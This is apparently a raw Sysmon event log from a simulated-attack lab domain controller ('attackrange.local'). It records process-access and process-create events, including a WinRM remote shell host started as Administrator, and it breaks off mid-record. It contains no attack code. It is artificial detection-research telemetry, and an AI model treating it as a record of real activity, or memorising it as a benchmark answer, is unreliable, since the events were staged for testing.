13:08:39.435{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4257-6000-C802-000000009901}3540C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.419{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4257-6000-C802-000000009901}3540C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.419{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4257-6000-C802-000000009901}3540C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.429{08A6967A-4257-6000-C802-000000009901}3540C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-40DD-6000-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.372{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:39.357{08A6967A-40DD-6000-0A00-000000009901}860948C:\Windows\system32\services.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:38.529{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:38.529{08A6967A-40DD-6000-0A00-000000009901}860960C:\Windows\system32\services.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:38.508{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-40DD-6000-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{08A6967A-40DD-6000-0A00-000000009901}860C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local2021-01-14 13:08:39.466Started13.014.50 10341000x800000000000000059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.981{08A6967A-4258-6000-CA02-000000009901}47364744C:\Windows\system32\conhost.exe{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40D2-6000-0500-000000009901}644768C:\Windows\system32\csrss.exe{08A6967A-4258-6000-CA02-000000009901}4736C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40D2-6000-0500-000000009901}6441160C:\Windows\system32\csrss.exe{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.940{08A6967A-4258-6000-C902-000000009901}1940C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{08A6967A-40DF-6000-0C00-000000009901}480C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.935{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:40.575{08A6967A-40DD-6000-0B00-000000009901}868604C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 